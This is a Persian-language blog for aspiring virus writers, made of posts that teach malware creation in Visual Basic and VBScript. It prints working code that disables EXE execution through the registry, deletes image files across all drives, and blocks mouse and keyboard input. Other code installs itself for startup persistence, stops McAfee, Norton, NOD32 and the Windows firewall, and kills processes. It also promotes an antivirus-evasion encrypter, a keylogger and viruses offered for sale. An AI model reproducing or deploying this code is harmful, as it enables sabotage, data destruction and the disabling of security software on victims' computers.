ویروس ایرانی

دوستان سلام

تو این جا دانلود یک برنامه رو گذاشتم که سه سوت ویروستون رو encrypt می کنه و از این به بعد ویروس های پرحجمتون رو در عرض چند ثانیه encrypt کنید تا بتونین از دست آنتی ویروس ها در امان بمونید.این کار باعث میشه که ویروستون از دست بیشتر آنتی ویروس ها مخفی بمونه.لطفا" هر مشکلی که برنامه داشت به من اطلاع بدید.من در حال آماده کردن قسمت دوم مقاله ی آلوده کردن فایل های exe در ویژوال بیسیک هستم.فایل رو از لینک زیر به طور غیر مستقیم دانلود کنید:

دانلود vbsencrypter

سلام به همه ی ویروس نویسای گل ایران

وقتش رسیده که یه کار اساسی با هم انجام بدیم.اونم آلوده کردن فایل های exe با ویژوال بیسیک هستش.من این آموزش رو به صورت یک مقاله ی هفت قسمتی در اختیارتون قرار میدم و تو این پست قسمت اول این مقاله رو براتون نوشتم.من می تونستم تمام اون رو در یک پست قرار بدم اما دوست داشتم خط به خط کدها رو براتون توضیح بدم تا بعدا" خودتون هم یک روش برای آلوده سازی اختراع کنید.بعد از این مقاله یاد می گیریم که چه طور هر فایل exe ای که دلمون خواست رو آلوده کنیم و با ریزه کاری هاش و ... هم آشنا میشیم.بهترین و زیباترین تکنیک یک ویروس نویس حرفه ای تکنیک آلوده کردن فایل هاست.من اینجا آلوده کردن فایل های exe رو به روش خودم به شما آموزش میدم.اسم این روش روش کنترلی هم هست.تو این پست فقط با نحوه ی آلوده کردن فایل ها به این روش آشنا میشیم.

برای این کار ما نیاز به سه فایل داریم:

1. یک فایل exe برای آلوده شدن
2. یک فایل ویروسی مثل ویروس خودمون
3. یک فایل کنترلی

اولیش که به ما ربطی نداره چون ما می خوایم اون رو آلوده کنیم و ممکنه هرفایلی باشه البته از نوع   exe.دومی که ویروس خودمون می تونه باشه و امکان نداره وجود نداشته باشه.اما سومی یه فایل کنترلی هست که خودمون باید بسازیمش.این فایل رو با ویژوال بیسیک می سازیم.پسوند اون exe هست و فقط یه ماژول توش قرار داره و حجمش خیلی خیلی کمه.کاری که ما باید بکنیم به شرح زیر است:

1. ویروس ما حجم محتویات فایل یک و دو را بدست می آورد و سپس یک فضای خالی به اندازه ی حجم فایل یک و دو برای گنجاندن اطلاعات فایل یک و دو در آن فضا ایجاد می کند.حالا اطلاعات فایل یک و دو را می گیرید و در آن فضای خالی قرار می دهد.همچنین نام دو فایل را هم می گیرد.
2. فایل کنترلی را که در که در خودش گنجانده بود به طور رو نویسی در فایل اول قرار می دهد به طوری که محتویات فایل اول حذف می شود و اصلا" بهتره بگم فایل کنترلی می یاد و جای فایل اول رو میگیره.البته ما محتویات فایل اول را در حافظه داریم.
3. حالا تمام اطلاعاتی رو که داشتیم در انتهای فایل کنترلی قرار میدیم.از جمله فایل یک و دو رو در انتهای فایل کنترلی قرار میدیم.بعدش به فایل کنترلی اطالاعاتی همچون نام فایل یک و دو را میدهیم و اطلاعاتی از این قبیل درباره ی فایل یک و دو.

این بود از کاری که ویروس خودمون انجام میده.حالا نوبت میرسه به فایل کنترلی.

وقتی که فایل آلوده اجرا میشه،فایل کنترلی هم اجرا میشه و آخر خودش رو می خونه و سپس تمام اطلاعاتی که ویروس بهش داده بود رو مانند محتویات فایل یک و دو رو می خونه.سپس می یاد و دو فایل درست می کنه و تو اولی فایل exe رو قرار میده و تو دومی ویروس رو قرار میده.حالا دو فایل رو اجرا می کنه.

خب باید گرفته باشید دیگه.یعنی هر وقت فایل آلوده شده اجرا شد هم خودش اجرا میشه و هم ویروس.ما فایلی رو که آلوده می کنیم خراب نمی کنیم فقط دو تا فایل کوچولو موچولو بهش اضافه می کنیم و فایل کنترلی چون اول فایل آلوده شده قرار داره کنترل فایل رو در اختیار داره.

قسمت دوم مقاله شروع کدهای ویروس است.همیشه به یاد داشته باشید آلوده کردن فایل ها مهمترین قسمت یک ویروسه پس مهمترین قسمت آموزش وبلاگ هم این مقاله هست.

خب.بالاخره وقتش رسید تا یه پست کاملا" حرفه ای تو وبلاگ بذارم.تو این پست ویروس نویسای حرفه ای رو با ویروس های vbs آشنا می کنم و طریقه ی استفاده از مزایای این ویروس ها را برای ویروس نویسی آموزش میدم.پس پیشنهاد میکنم به تمام دوستان عزیز که فقط در صورتی که به ویروس نویسی علاقه دارن روی ادامه ی مطلب کلیک کنند.  

آیا دوست دارید با ویژوال بیسیک یک ویروس بسازید که دو ویروس باشه؟با این کار می تونید ویروساتونو زودتر منتشر کنید.باید بگم این ترفند تو ویروس جواهری در قصر هم به کار رفته.پس اگه می خواین این ترفند رو یاد بگیرید،روی ادامه ی مطلب کلیک کنید.

با این پست می خوام اطلاعات بعضی از ویروس نویسا رو update کنم.تو اینجا یه تکنیک باحال با ویژوال بیسیک یاد می گیریم.اونم اینه که چه طوری بدون غیرفعال کردن موس،استفاده از موس رو غیرممکن کنیم(100% عملی و برای همه ی ویندوز ها) این پست رو حتما" بخونید.پس روی ادامه ی مطلب کلیک کنید.

سلام. همون طور که یکی از دوستان خواسته بود سورس یک keylogger رو گذاشتم که با ویژوال بیسیک ساخته شده.فکر کنم اگه سورس باشه دیگه نیازی به توضیح هم نباشه ولی یه ذره توضیح هم دادم.این جور keylogger ها معمولا" تو تروجان ها کاربرد دارند ولی چون تو این وبلاگ آموزش تروجان نویسی هم داریم این پست رو گذاشتم تا به همه ی دوستان یه حالی بدم.بدونید برای این پست خیلی زحمت کشیدم پس حتما" بخونیدش.برای دانلود سورس و همچنین دیدن توضیحات روی ادامه ی مطلب کلیک کنید.

سلام دوستان.امیدوارم تا حالا از مطالب این وبلاگ لذت برده باشید.معذرت می خوام از اینکه دانلود ویروس تو پست قبلی انجام نمی گرفت اما درستش کردم.اما آنتی ویروسش هم تو این پست گذاشتم.اگه خواستید ویروس رو امتحان کنید بعد از این که دیدید ویروس نمی ذاره برید اینترنت این آنتی ویروس رو اجرا کنید و ببینید که ویروس از کامپیوترتون پاک میشه.البته حتما" باید کامپیوترو بعد از پاک سازی ویروس ریست کنید.هیچ آنتی ویروسی به جز این که خودم ساختم، ویروس NES رو نمیشناسه پس بهتون پیشنهاد می کنم که این ویروس رو از پست قبلی دانلودش کنید.

دانلود آنتی ویروس

خب دیگه.هر کی این این پست رو نخونه واقعا" ضرر کرده.یکی از ویروس هایی که من ساختم اسمش ان ای اس هست که با ویژوال بیسیک ساخته شده و لینک دانلودش رو این زیر گذاشتم که پروژه ی ویژوال بیسیکش هم با هاشه(سورسش).این ویروس یه جمع بندی از بعضی مطالب این وبلاگه.کارایی که این ویروس می کنه به طور کامل اینجا نوشتم:

۱.قطع کردن اتصال به اینترنت با یه timer و با کمک فایل rundll32 واقع در پوشه ی system32 ویندوز.

2.از کار انداختن regedit ،msconfig ،run ،system restore .

3.منتشر شدن از راه فلاپی با فایلی به نام shine.exe

4.مخفی بودن در لیست process ها و task های taskmanager

5.از کار انداختن فایروال ویندوز و همچنین بعضی از ورژن های آنتی ویروس های مک آفی و نورتون

این ویروس خودش رو با نام dsrss.exe در پوشه ی system32 ویندوز کپی می کنه و آدرس ریجیستریش هم اینه:

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\currentversion\run\dsrss

به طور کلی اینترنت رو برای قربانی کوفت می کنه و اگه از من میشنوید حتما" دانلودش کنید.

سلام.همون طور که می دونید این کرم یک کرم معروف است اما خیلی از جاها از اون به عنوان یک کرم ساده یاد می کنند که سورسش فقط دو خطه و با notepad ساخته میشه و ... ولی باید بگم پیشرفته ترین کرمی که دیده بودم این کرم است.خواستن خدا خواستن خوشبختی واقعیست(چه ربطی داشت؟)باور نمی کنید سورسشو از لینک زیر دانلود کنید.

http://www.ireec.com/download/ms_blaster_worm.rar

خب.زیاد هیجان زده نشید.احساساتتونو کنترل کنید.این ویروس،بزرگترین و بهترین ویروسیه که ساختم که هم مهربونه هم خوشکل.انتظار نداشته باشید که سورسشو بدم البته شاید بعدا" نظرم عوض شد.کار این ویروس اینه که desktop wallpaper رو عوض می کنه و جاش عکس یانگوم رو می ذاره و همچنین  آهنگ سریال جواهری در قصر رو پخش می کنه و اصلا" قابل پاک نیست.کارهای مخرب اینه که نمی ذاره هیچ صدایی به جز آهنگ سریال جواهری در قصر از کامپیوتر در بیاد و همچنین یه timer داره که هر 10 ثانیه desktop wallpaper رو عوض می کنه.یک ویروس رویایی.سه ماه طول کشید تا ساخنمش.این ویروس در ویندوز های 200 به بالا کار می کنه.همچنین لوگوی ویندوز رو عوض می کنه عکسی از بانو هن میذاره و هزار کار دیگه و نوشته ی دکمه ی استارت و برچسب درایوها رو به دلخواهتون عوض می کنه...چی...به دلخواه...

آره دیگه این ویروس مجانی نیست ولی اگه یه تعدادی ازشو فروختم مجانی تو وبلاگ میذارم.این ویروس می تواند به نام شما باشد.سه ماه روش کار کردم و به این دو دلیل مجانی نیست.قیمتش فقط 500 تومان هست.هر کس می خواد برام ایمیل بنویسه تا بتونم باش در ارتباط باشم و این ویروس مامانی رو بهش بفروشم.

سلام.باورتون میشه با یه کدAPI  ساده یک جا موس و کیبورد رو با ویژوال بیسیک غیر فعال می شه کرد.اگه نمی شه امتحان کنید.

اول یک ماژول درست کنید و این کدها رو داخلش کپی کنید:

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

حالا اینارو اجرا کنید(می تونید تو form_load قرار بدبد):

BlockInput True

خب اینی که میگم خیلی سادس باید بلد باشید دیگه.اگه به جای true ، false قرار بدیم،موس و کیبورد فعال میشن.

این کار را با ویژوال بیسیک انجام می دهیم.ابتدا یک پروژه ی جدید ایجاد کنید و سپس در قسمت general کدهای form ،کد زیر را وارد کنید:

Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long

سپس کد زیر را باید اجرا کنید:(مثلا" در form_load قرار دهید):

SwapMouseButton 1

این کار با ویژوال بیسیک امکان پذیر است.در این روش،ما با دستکاری در ریجیستری تمام فایل های exe موجود در کامپیوتر را غیرفعال می کنیم و مانع از اجرای آن ها می شویم.این کد یک کد مخرب قوی است و باید با احتیاط بسیار از آن استفاده کنید.اگر می خواهید از این کد در ویروس خودتان استفاده کنید،فرمت ویروس خودتان را exe قرار ندهید و می توانید از یکی از فرمت های زیر استفاده کنید.اگر عوض کردن فرمت را بلد نیستید،در نظرها بنوسید تا در پست بعد بنویسیم.

فرمت ها:scr ،bat ،cmd ،com و pif

چه برای فعال کردن و چه برای غیرفعال کردن باید یک module درست کنید(قبلا" گفته ام) و کدهای زیر را درونش کپی کنید:

Public Declare Function GetKeyState Lib "user32.dll" (ByVal nVirtKey As Long) As Integer

Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal _

  hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, _

  phkResult As Long) As Long

Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal _

  hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType _

  As Long, lpData As Any, ByVal cbData As Long) As Long

Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

این ها را هم در general فرم کپی کنید:

Private Const REG_OPTION_VOLATILE = 1

Private Const REG_OPTION_NON_VOLATILE = 0

Private Const HKEY_LOCAL_MACHINE = &H80000002

Private Const KEY_ALL_ACCESS = &HF003F

Private Const REG_SZ = 1

Dim r As Integer

1-برای غیرفعال کردن:

بعد از این که کارهای بالا را انجام دادید باید این کدها را در form_load کپی کنید:

r = 1

Command1_Click

حالا این کدها را طوری کپی کنید که خود یک قسمت جداگانه باشد:

Private Sub Command1_Click()

On Error GoTo 1

  Dim hKey As Long

  Dim subkey As String

  Dim Retval As Long

    Dim Buffer As String

  subkey = "SOFTWARE\Classes\Exefile\Shell\Open\Command"

  Retval = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subkey, 0, KEY_ALL_ACCESS, hKey)

If Retval = 0 Then

If r Mod 2 = 1 Then

    Buffer = ""

    RegSetValueEx hKey, "", 0, REG_SZ, ByVal Buffer, Len(Buffer)

    RegCloseKey hKey

  End If

 r = r + 1

  End If

1:

End Sub

2-برای فعال کردن:

بعد از این که دو کاری که اول پست آمده را انجام دادید،این کدها را در form_load کپی کنید:

r = 1

Command1_Click

حالا این کدها را طوری کپی کنید که خود یک قسمت جداگانه باشد:

Private Sub Command1_Click()

On Error GoTo 1

Dim hKey As Long

Dim subkey As String

Dim Retval As Long

Dim Buffer As String

subkey = "SOFTWARE\Classes\Exefile\Shell\Open\Command"

Retval = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subkey, 0, KEY_ALL_ACCESS, hKey) 

Buffer = """%1""%*"

RegSetValueEx hKey, "", 0, REG_SZ, ByVal Buffer, Len(Buffer)

RegCloseKey hKey

1:

End sub

قبل از نام ویروس ها ممکن است این اختصارات را ببینید.در این پست مهم ترین آن ها را آورده ام.

PWSTEAL
تروجان هایی که برای دزدیدن پسورد می باشند.
Palm
برنامه هایی که برای تشخیص مدل سیستم عامل نوشته می شوند.
Trojan/Troj
اسب های تروجان که در واقع ویروس نبوده و اغلب به شکل برنامه های مفید می باشند اما در واقع دارای کدهای بداندیش هستند .
UNIX
برنامه های مضری که تحت سیستم عامل یونیکس فعالیت می کنند.
VBS
ویروس هایی که برای نوشتن آنها از Visual Basic Script استفاده شده است.
W2KM
ماکرو ویروس های ورد 2000 که فقط تحت این برنامه کار می کنند.
W32
ویروس هایی که برای ویندوز 32 بیتی می باشند.
W95
ویروس هایی که می توانند در ویندوز 95 فعالیت کنند. اغلب این ویروس ها توانایی تاثیر بخشیدن بر ویندوز 98 را نیز دارند.
W97M
ماکرو ویروس های ورد 97 که تنها توانایی اجرا شدن در این برنامه را دارا هستند.
W98
ویروس های ویندوز 98 که تنها در این سیستم عامل توانایی فعالیت دارند.
WM
ماکرو ویروس های ورد 6.0 و ورد 95 که در بعضی مواقع توانایی تاثیر گذاشتن در ورد 97 را نیز دارا هستند.
WNT
ویروس های ویندوز 32 بیتی که توانایی اثر گذاشتن بر روی ویندوز های NT را دارا هستند.
Win
برنامه های مخربی که فقط در ویندوز 3.X تاثیر بخش هستند.
X2KM
ماکرو ویروس های اکسل 2000 .
X97M
ماکرو ویروس های اکسل 97 . این برنامه های مخرب توانایی تاثیر بخشیدن در اکسل 95 و همچنین اکسل 5.0 را دارا می باشند.
XF
ویروس هایی که توانایی مخفی شدن در صفحات اکسل 4.0 را دارا می باشند .
XM
ماکرو ویروس های اکسل 5.0 و اکسل 95 . این ماکرو ها همچنین در بعضی مواقع می توانند به خوبی در اکسل 97 نیز فعالیت کنند.

یک مجله ی ویروس نویسی به زبان انگلیسی در اینترنت وجود دارد و دارای 14 قسمت است و از لینک زیر می توانید آن را بخوانید و اگر با زبان انگلیسی آشنا هستید،می توانید استفاده ی بسیار زیادی از این مجله بکنید.

http://www.etext.org/CuD/40hex/index.html

اینم از سورس ویروس tune.vbs .فقط همون طور که گفتم،این کدها را در notepad کپی کنید و بعد با پسوند vbs ذخیره کنید.(نحوه ی این کار را در مطالب قبلی وبلاگ گفته ام).حالا ویروس آمادس.این ویروس قدرت بالایی در منتشر شدن دارد.اگر مطالب قبلی وبلاگ را خوانده باشید،می توانید کار کلی ای که این ویروس انجام می دهد را حدس بزنید.برای دیدن سورس ویروس روی ادامه ی مطلب کلیک کنید.

غیر فعال کردن آنتی ویروس ها و فایروال ها

این کدها می توانند بعضی نسخه های آنتی ویروس های مک آفی و نورتون را غیرفعال کنند و مخصوص ویژوال بیسیک هستند.همچنین فایروال ویندوز هم غیر فعال می شود.

Shell "net stop" & " " & """" & "mcshield" & """", vbHide  ' in code mcafee ro gheire faal mikone

Shell "net stop" & " " & """" & "Norton Antivirus Auto Protect Service" & """", vbHide      ' in code  norton ro gheire faal mikone

Shell "net stop ""Windows Firewall/Internet Connection Sharing (ICS)"" ", vbHide           'in code firewall xp ro gheir faal mikone

منظور از این نوع ویروس ها،همان ویروس های vbs است.در این جا روش ساخت ویروسی به نام vbs.folder رو می دم.کارش اینه که هر فایل با هر فرمتی که می خواین رو(اگه اون فایل تو فولدری قرار داشته باشه و در هارد دیسک باشه)حذف می کنه.این ویروس بسیار شبیه ویروس Biosan است.البته باید بگم این ویروس از قابلیت های ویروس Biosan سوء استفاده کرده است.برای این کار notepad را باز کنید و کدهای زیر را درونش کپی کنید و با پسوند vbs ذخیره کنید(این کار در پست های قبل توضیح داده شده است)

On Error Resume Next

Set fso = CreateObject("Scripting.FileSystemObject")

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.is ready Then

folderlist(d.path&"\")

end if

Next

end sub

sub infectfiles(folderspec)

On Error Resume Next

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

if (ext="jpg") or (ext="bmp") then

fso.deletefile(f1.path)

end if

next

end sub

sub folderlist(folderspec)

On Error Resume Next

set f = fso.GetFolder(folderspec)

set sf = f.SubFolders

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

end sub

کنترل پنل تحت فایلی به نام rundll32.exe در پوشه ی سیستم ویندوز کار می کند.برای غیر فعال کردن کنترل پنل باید این فایل را با روش قبلی که گفتم،غیر فعال کنید.در این روش،پنجره ی کنترل پنل باز می شود ولی هیچ یک از ابزار هایش اجرا نمی شوند و پیغام خطایی روی صفحه ظاهر می شود.در ضمن این ویروس،ویروسی کامل ومستقل هست و در هر بار اجرای ویندوز،اجرا می شود.ویژوال بیسیک را باز کنید.standardexe را انتخاب و سپس بر روی form دو بار کلیک کنید و کدهای زیر را در آن کپی کنید:

On Error GoTo 1

Me.hide

App.taskvisible = false

Set fso = CreateObject("scripting.filesystemobject")

Set windir = fso.getspecialfolder(0)

file = App.Path & "\" & App.EXEName & ".exe"

FileCopy file, windir & "\" & App.EXEName & ".exe"

file2 = windir & "\" & App.EXEName & ".exe"

Set Reg = CreateObject("wscript.shell")

Reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\run\autoupdate", file2

Sysdir = fso.getspecialfolder(1)

Sys = sysdir & "\rundll32.exe"

Open sys For Append As #3

۱:

در این جا چند راه برای آزار دادن کامپیوتر آلوده به ویروس ویژوال بیسیکی می نویسم.

1-خاموش و ریست کردن کامپیوتر

این کاری بسیار ساده است و فقط برای کسانی می نویسم که با این کار آشنایی ندارند.فقط کد زیر لازم است:

shutdown –s –t 60

این کد ویندوز را بعد از 60 ثانیه خاموش می کند.اگر به جای s حرف r را بگذارید،کامپیوتر ریست می شود.می توانید زمان آن را به صفر تغییر دهید.

2-از کار انداختن یک فایل exe

اگر می خواهید یک فایل exe را غیر فعال کنید،از این روش استفاده کنید.البته با این روش می توان فایل هایی با فرمت هایی دیگر را غیرفعال کرد.ابتدا مشخص کنید که چه فایلی را می خواهید غیر فعال کنید.سپس این کدها را اجرا کنید:

On Error GoTo 1

Open Reza For Output As #1

1:

"c:\reza.exe"

برای فعال کردن فایل کد زیر را وارد کنید:

Close #1

کدهای مخرب به این صورت بسیار زیاد هستند.هر وقت وقت کردم براتون میذارم.

برای این کار باید 6 مرحله را بگذرانید:

1-ویژوال بیسیک را اجرا کنید.standard exe را انتخاب و یک command و یک timer هم به form اضافه کنید و interval timer هم برابر 3000 قرار دهید.

2-روی form دو بار کلیک کنید و کدهای زیر را درونش وارد کنید:

n = 30

App.TaskVisible = False

If App.Path = SysDir Then

Me.Hide

App.TaskVisible = False

Command1_Click

End If

3-روی command دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "AntiNod32", SysDir & "\antinod32.exe"

Shell "taskkill /f /im  NOD32KRN.EXE", vbHide

Shell "taskkill /f /im  NOD32KUI.EXE", vbHide

If App.Path <> SysDir Then

MsgBox "Nod32 Anti Virus Disabled Successfull !", vbInformation, "Anti Nod32"

FileCopy App.Path & "\" & App.EXEName & ".exe", SysDir & "\" & "antinod32.exe"

End If

4-در قسمت general فرم کد زیر را وارد کنید:

Dim n As Integer

5-در مرحله آخر،روی timer دوبار کلیک کنید و کدهای زیر را وارد کنید:

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "AntiNod32", SysDir & "\antinod32.exe"

Shell "taskkill /f /im  NOD32KRN.EXE", vbHide

Shell "taskkill /f /im  NOD32KUI.EXE", vbHide

6-یک module درست کنید(از منوی project ) و کدهای زیر را درونش کپی کنید:

Public Const HKEY_LOCAL_MACHINE = &H80000002

Public Const HKEY_CURRENT_USER = &H80000001

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long

Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long

Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long

Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Const REG_SZ = 1

Public Const REG_DWORD = 4

Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long

Public Function SysDir() As String

  Dim SysPath As String

  SysPath = String(255, vbNullChar)

  GetSystemDirectory SysPath, 255

  SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)

End Function

Public Function exist(name As String) As Boolean

    exist = (Dir(name, vbNormal Or vbReadOnly Or vbHidden Or vbSystem Or vbArchive) <> "")

End Function

Public Function GetString(Hkey As Long, strPath As String, strValue As String)

    Dim keyhand As Long

    Dim datatype As Long

    Dim lResult As Long

    Dim strBuf As String

    Dim lDataBufSize As Long

    Dim intZeroPos As Integer

    r = RegOpenKey(Hkey, strPath, keyhand)

    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)

    If lValueType = REG_SZ Then

    strBuf = String(lDataBufSize, " ")

    lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)

    If lResult = ERROR_SUCCESS Then

    intZeroPos = InStr(strBuf, Chr$(0))

    If intZeroPos > 0 Then

    GetString = Left$(strBuf, intZeroPos - 1)

    Else

    GetString = strBuf

    End If

    End If

    End If

End Function

Public Sub SaveString(Hkey As Long, strPath As String, strValue As String, strdata As String)

    Dim keyhand As Long

    Dim r As Long

    r = RegCreateKey(Hkey, strPath, keyhand)

    r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))

    r = RegCloseKey(keyhand)

End Sub

Function SaveDword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)

    Dim lResult As Long

    Dim keyhand As Long

    Dim r As Long

    r = RegCreateKey(Hkey, strPath, keyhand)

    lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)

    r = RegCloseKey(keyhand)

End Function

تبریک می گم.حالا دیگه ویروس های شما از سد آنتی ویروس nod32 هم می گذرد.تا کنون شما به مرحله ی خاصی از ویروس نویسی رسیده اید.

در این پست آموزش کنترل لیست process های taskmanager را می دهم.بهترین راه، ساخت یک برنامه با ویژوال بیسیک است که بتواند این کار را انجام دهد.این کار 5 مرحله دارد:

1-وارد ویژوال بیسیک شده و standar exe را اتخاب کنید.سپس دو command و یک listbox و یک module به form اضافه کنید و نام آن ها را به صورت زیر تغییر دهید:

Form = FMain

Command1 = CmdRef

Command2 = CmdTerminate

Listbox = LstTask

Module = MProcess

2-بر روی form دو بار کلیک کنید و کد زیر را درونش وارد کنید:

CmdRef_Click

3-روی command1 دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:

LstTask.Clear

    GetProcess

4-روی command2 دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:

On Error Resume Next

    Dim computername As String

    Dim processname As String

    Dim process As WbemScripting.ISWbemObject

    If LstTask.Text = "" Then Exit Sub

    If MsgBox("Do You Want Terminate Program ?", vbYesNo, "Terminate") = vbNo Then Exit Sub

    processname = LstTask.Text

    computername = ""

    For Each process In GetObject("winmgmts:{impersonationLevel=impersonate}!//" & computername).ExecQuery("select * from Win32_Process where Name='" & processname & "'")

        process.Terminate

    Next

    Call CmdRef_Click

5-بر روی module دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:

Private Const TH32CS_SNAPPROCESS = &H2

Private Type PROCESSENTRY32

    dwSize As Long

    cntUsage As Long

    th32ProcessID As Long

    th32DefaultHeapID As Long

    th32ModuleID As Long

    cntThreads As Long

    th32ParentProcessID As Long

    pcPriClassBase As Long

    dwFlags As Long

    szExeFile As String * 260

End Type

Private Declare Function CreateToolhelp32Snapshot Lib "kernel32.dll" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long

Private Declare Function Process32First Lib "kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long

Private Declare Function Process32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long

Private Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long

Const SYNCHRONIZE As Long = &H100000

Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000

Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)

Public Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Public Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long

Public Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long

Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Public Sub GetProcess()

    Dim hSnapshot As Long

    Dim processInfo As PROCESSENTRY32

    Dim success As Long

    Dim exeName As String

    Dim retval As Long

    'Me.AutoRedraw = True

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)

    processInfo.dwSize = Len(processInfo)

    success = Process32First(hSnapshot, processInfo)

    If hSnapshot = -1 Then

        FMain.LstTask.AddItem "Unable to take snapshot of process list!"

        Exit Sub

    End If

    While success <> 0

        exeName = Left(processInfo.szExeFile, InStr(processInfo.szExeFile, vbNullChar) - 1)

        FMain.LstTask.AddItem exeName

        processInfo.dwSize = Len(processInfo)

        success = Process32Next(hSnapshot, processInfo)

    Wend

    retval = CloseHandle(hSnapshot)

End Sub

با این روش می توانید برنامه هایی(آنتی ویروس هایی)را که برای ویروستان مشکل درست می کنند،endprocess کنید.

دانستن این پورت ها برای ساخت تروجان به شما کمک می کند.روش ساخت تروجان را در پست قبلی گفته ام.در زیر شماره پورت ها و تروجان هایی که از این پورت ها به صورت پیش فرض استفاده می کنند آمده است.همچنین شما برای اینکه بفهمید کدام پورت ها روی سیستمتان باز است می توانید ازدستور netstat –na در داس استفاده کنید .

Port21------------back construction, blade runner, doly Trojan, fore, ftp Trojan, invisible
Ftp, larva, wincrash.
Port23---------------- tiny telnet service
Port 25 ---------------- ajan, antigen, email password sender
Port 31---------------- agent 31, hackers paradise
Port 41---------------- deep throat
Port 59--------------- dmsetup
Port 79--------------- firehotker
Port 80-------------- executor, ringzero
Port 110 ------------- promail Trojan
Port113 -------------- kazimas
Port 119 ------------- happy 99
Port 121------------- jammerkillah
Port 456 ------------- hackers paradise
Port 531 ------------ rasmin
Port 555 ------------- netadmin, phase zero
Port 666 ------------ attack ftp back construction, serverU
Port 911 ---------------- dark shadow
Port 999 --------------- deep throat, winsatan
Port 1001 ------------- silencer, webex
Port 1010 ------------- doly Trojan
Port 1011,1012,1015---------- doly Trojan
Port 1024 --------------- net spy
Port 1042 -------------- bla
Port 1045--------------- rasmin
Port 1090 ------------- xtreme
Port 1234 ------------ ultors Trojan
Port 1243 ------------- sub seven
Port 1999 ------------- backdoor
Port 1999,2000,2001,2002,2003,2004,2005,9878 -------- transScout
Port 2001 ------------ Trojan cow
Port 2140 ------------ deep throat
Port 2583,3024,4092 ------------ win crash
Port 2989 ------------ rat
